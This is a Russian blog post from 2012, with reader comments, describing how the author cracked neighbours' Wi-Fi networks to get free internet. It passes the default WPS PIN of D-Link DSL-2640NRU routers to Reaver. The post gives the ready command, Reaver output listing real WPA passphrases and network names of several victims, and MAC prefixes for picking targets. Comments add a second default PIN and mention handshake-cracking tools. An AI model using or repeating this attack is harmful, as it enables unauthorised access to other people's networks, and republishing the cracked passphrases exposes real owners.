Пользователь
0,0
рейтинг
27 сентября 2012 в 23:48

Разработка → Взломать Wi-Fi за… 3 секунды из песочницы

Какой человек не любит халявы? Практически все ее просто обожают, и я не исключение. Вдохновленный статьей «Взломать Wi-Fi за 10 часов» я достал из недр харда BT5, скачанный ранее, и записал его на болванку. Результат не заставил себя ждать, и первый пароль был получен на следующее утро. И понеслась…

Однако, каково же было мое удивление, когда у второй жертвы оказался тот же пин-код, что и у первой (в частности такой: 46264848). Замечу, что роутеры были одинаковые, D'Link DSL 2640NRU, пожалуй, самая распространенная модель на рынке. С версией прошивки 1.0.10.

В итоге, из 6 аппаратов (из них было 5 Д'Линков), попавшихся мне, у 4 были одинаковые пин-коды, которые, кстати, меняются после прошивки и восстанавливаются после обратного перехода на 1.0.10. В чем дело: одна партия роутеров? Одна прошивка? Не знаю, но факт остается фактом, время атаки на львиную долю роутеров можно сократить с 2-∞ часов до нескольких секуннд, учитывая, что большинству людей плевать на безопасность своей сети (из-за своей лени или невежества?).

Для этого нужно всего лишь вписать конкретный пин-код в команду Reaverу:

reaver -i mon0 -b xx:xx:xx:xx:xx:xx -p 46264848 -vv

В сухом остатке имеем:

image
image

Или так…

[+] Pin cracked in 3 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: '12316061989'
[+] AP SSID: 'Shat_SatyricoN'

[+] Pin cracked in 51 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: '3159801111'
[+] AP SSID: 'DOMIK'

[+] Pin cracked in 47 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: '29051966'
[+] AP SSID: 'serg'

[+] Pin cracked in 17 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: '19361'
[+] AP SSID: 'DSL_2640NRU'

[+] Pin cracked in 3 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: '3CQEPazxYCGY'
[+] AP SSID: 'Home'

[+] Pin cracked in 15 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: 'dimetriys80'
[+] AP SSID: 'DSL_2640NRU'

[+] Pin cracked in 3 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: 'ton_ton75'
[+] AP SSID: 'DSL_2640NRU'

(Надеюсь, хозяева сетей не читают Хабр)

BSSID роутеров, которые стоит попробовать на вкус, чаще всего начинаются с
B8:A3:86
C8:BE:19
1C:7E:E5 (полный список смотри тут)

Также замечу, что сети часто не переименовывают, и в списке доступных почти всегда висит по нескольку «DSL_2640NRU».
Ушанов Антон @ushanov90
карма
27,5
рейтинг 0,0
Реклама помогает поддерживать и развивать наши сервисы

Подробнее
Реклама

Самое читаемое Разработка

Комментарии (63)

  • –28
    Зря вы всё это в паблик выложили. Некрасиво как-то, по-моему. Лучше бы тем же соседям как нибудь ткнули на это, чтобы исправили.

    > (Надеюсь, хозяева сетей не читают Хабр)
    Лучше бы прочли и закрыли дыру в безопасности.
    • +1
      В смысле, лучше было бы, если всё же читают Хабр.
    • 0
      Формально статья и написана для того, чтоб люди опомнились и закрыли дыры, так же как и BackTrack — это система для тестирования на уязвимости сетей
      • 0
        Это-то понятно. Проблема в том, что большинство, кто сидит на Хабре, и так за этим следят. Как минимум на подсознательном уровне, что прошивку надо своевременно обновлять и всё такое. А те, кого это касается — не прочтут. Ну или по счастливой случайности, вбив в поиск свой SSID
        • +1
          Об уязвимости известно давно, и, если ты пользуешься чем-то, то стоит узнать об этом побольше, и защитить себя. Спасение утопающих… А касаемо соседей, то я их не знаю, хата съемная)
    • 0
      Если он и исправит ситуацию с соседями, что это даст? Это же глобальная проблема! Даже если все пользователи хабра залатают дыры своих соседей не факт что это поможет!
      • 0
        С масштабами проблемы согласен. Я говорю про SSID сети и PSK ключи. По моему, это как-то неприлично. Ну что ж, у каждого на это своё мнение.
        • 0
          Хм. А если написать в саппорт Длинка, они быстро отреагируют? И отреагируют ли вообще?
    • 0
      Пароль от еще одного Wi-Fi дома никогда не повредит. Как минимум для того чтоб оплатить свой интернет :)
  • +2
    46264848

    У двух моих соседей такой же :)
    • +2
      О чем, собственно, я и не думал совсем до прочтения поста. Спасибо
  • –2
    У меня была проблема другого характера… на работе есть keenetic для раздачи служебного диапазона… столкнулся раза 2 ( произвольный сброс на заводские ( с открытым инетом и без шифрования… прошивка последняя… роутер без доступа физического… на отдельном vlan (Это и спасло)… тестируйте вифи перед подключением в боевую сеть, коллеги… Спасибо за внимание… рад выслушать мнения и рекомендации...P.S. роутеров несколько таких но одна партия.
    • НЛО прилетело и опубликовало эту надпись здесь
      • 0
        Раньше соседняя точка ZyXEL Keenetic пробивалась через reaver (inflator), теперь wash -i mon0 её не показывает, полагаю прошивку обновили и отключили WPS.
        • НЛО прилетело и опубликовало эту надпись здесь
    • +9
      рукалицо.
      1. что значит этот набор слов и скобок?
      2. почему только одна точка в конце?
      • +1
        Это ж смайлы.
        • –1

          Это ж смесь Lisp и 1C.

    • 0
      Нужно больше точек!
  • +3
    У моих соседей.

    С версией прошивки 1.0.10.
    Скрытый текст
    46264848

    С версией прошивки 1.0.48. (DSL_2640NRU)
    Скрытый текст
    76229909
  • –6
    золотой пост
  • –2
    может и у других роутэров есть дэфалтные пины
  • 0
    Присоединяюсь, в Украине, тоже не сменен на DSL-2640NRU PIN 46264848
  • +16
    Мораль басни — юзайте DD-WRT!
    • –13
      +1
      • 0
        минус много =)
        • –1
          интересно чего? От сетевой безопасности вы по-видимому далеки
          • 0
            Голосов, потому что комментировать надо по делу. А для + или — 1 существуют голосование за комментарий, они как бы удобнее.

            От сетевой безопасности наверное далек, но статья на меня не распространяется даже с базовой глючащей прошивкой версии 1.03 от 2007-го года, которую мне тупо лень перепрошивать.
    • 0
      По-моему, эту мораль глаголят 99% стоковых прошивок роутеров.
      Мой Netgear WNDR3700, благо что железно крайне годен (и нынче под OpenWRT работает как часы) радостно отваливал DNS Resolve в течение 15 минут. К тому же, там не хватало вполне базовой функциональности, а при включении мак-фильтрации гостевая сеть так же фильтровалась, что делало ее бесполезной.
    • 0
      А я впервые от вас узнал об этом. Благодарю.
    • +1
      Зачем ссылки с ошибкой?
      • 0
        Извините, налажал с разметкой.
        Ссылки рабочие, скопируйте и вставьте в новой вкладке.
  • 0
    Надо это пост в блокнотик записать или заскроблить иначе его просто спрячут.
  • 0
    Надо бы базу стандартных пинов организовать
  • 0
    Отключать нафиг этот WPS где только можно.
    Менять его пин.
    Менять дефолтный пароль, по возможности и логин к админке точки доступа.
    Использовать более сложный пароль для WIFI.
    Сменить дефолтный SSID.
    Скрыть SSID хотя бы от хомячков.
    Фильтровать клиентов по макам.
    Фильтровать доступ к админкам самой точки.
    • 0
      Тема для статьи?..
      • 0
        А то мало этих статей?
        На мой взгляд это минимальная база которую следует сделать перед включением ДОМАШНЕЙ точки в работу.
        • 0
          Полностью согласен, но большинству людей до лампочки, что не может не печалить.
          • 0
            Дело не в «до лампочки» а в банальном непонимаи чем грозит нечитае инструкций по настройке.
            Ну или вот еще приходят мальчики от провайдера — они с той точкой морочиться тоже не будут — а потом по району светится полторы сотни точек с абсолютно одинаковым SSID, рекламирующим этого оператора.
    • 0
      Отключать нафиг этот WPS где только можно.

      Сменить дефолтный SSID.
      ...

      Так и делаю. Удивительно, как можно иначе. У нас самый большой провайдер ставит всем по-дефолту одинаковый SSID «Internet», а в дополнение к нему ещё в некоторых модемах делает вторую сеть «VOIP», в результате в типовой квартире ловится как минимум несколько «интернетов» и «воипов» и когда переходишь с одного места в другое комп автоматически пытается (ессно безуспешно т.к. PSK не совпадает) залогиниться в «знакомую» сеть.
      • 0
        По BSSID фильтрацию не включить?
        • 0
          А как его узнать этот BSSID?
          • 0
            Под виндой — не уверен, а под линуксом (при подключенном вайфае) —
            $ iwconfig
            wlan0	IEEE 802.11bg	ESSID:"Wireless"
            	Mode:Managed	Frequency:2.452 GHz	Access Point: XX:XX:XX:XX:XX:XX

            XX:XX:XX:XX:XX:XX и есть BSSID вашей точки.
      • +1
        А мне не жалко инета — гостевой ssid с отдельным зашейпенным VLANом =)
        • 0
          Всегда удивлялся людям вроде Вас. Понимаете ли, тут дело вовсе не в том жалко или не жалко, а в том, что раздавать инет проходимцам — это почти тоже самое, что доверять единицу огнестрельного оружия, зарегистрированную на Вас неизвестно кому. Мир опасен, в нем кишит много индивидов, которые легко могут совершить в сети нечто такое, что неизбежно приведет Вас к тесному общению с представителями правоохранительных структур (это еще если повезет, то правоохранительных).
    • +1
      Скрывать SSID бесполезно. Фильтровать MAC еще более бесполезно. Все остальное актуально, но на самом деле гораздо проще (и удобнее) держать открытый гостевой wifi с isolation.
      Другое дело, что у меня у половины соседей wep и админка под паролем admin (мне сосед так сказал)
  • +1
    если б еще reaver был бы на android…
  • 0
    ushanov90, ты случаем не из Пушкина? А то у меня предложенный тобой пароль от сетки Home подошёл… :) И некто DSL_2640NRU иногда в радиусе скана появляется… совпадение?
    • 0
      Хм… Не из Пушкина… Совпадение. Мистика да и только.
  • 0
    Вам удалось агрегировать несколько wi-fi каналов? Даже не задавался таким вопросом никогда, сколь одновременных соединений может быть у обычного вайфай контроллера компьютера?
    • 0
      У обычного — одно.
  • 0
    логины, пароли, SSID… еще какой-то WPS PIN придумали. что это зачем?
    • 0
      Нашел в первой статье все. СБ, я этим не пользуюсь
      • 0
        Теперь убедитесь, что этим не пользуется ваш AP :)
        • 0
          Что то не соображу AP — это кто-что?
          • 0
            Access Point.
  • 0
    А пробовал кто-нибудь прямую атаку на WPA предполагая, что PSK — номер телефона?
    Ключи подобного рода сейчас слишком распространенная практика.
    • 0
      Собсно атака на WPA/WPA2 сводится к сбору хендшейков. В Backtrack добавили суперскую утилиту besside-ng, которая делает все необходимые операции. После этого остается только запастись нормальными словарями, попкорном (ну и терпением :) и заюзать hashcat.
  • +4
    Я ломал соседние точки не ради халявы, а чтобы перевесить их на другой канал, и освободить себе 13, а то работать вообще невозможно было.
    • –1
      Никогда не наблюдал каких-либо проблем с каналами.
      Как это проявляется? Скорость проседает?

Только зарегистрированные пользователи могут оставлять комментарии. Войдите, пожалуйста.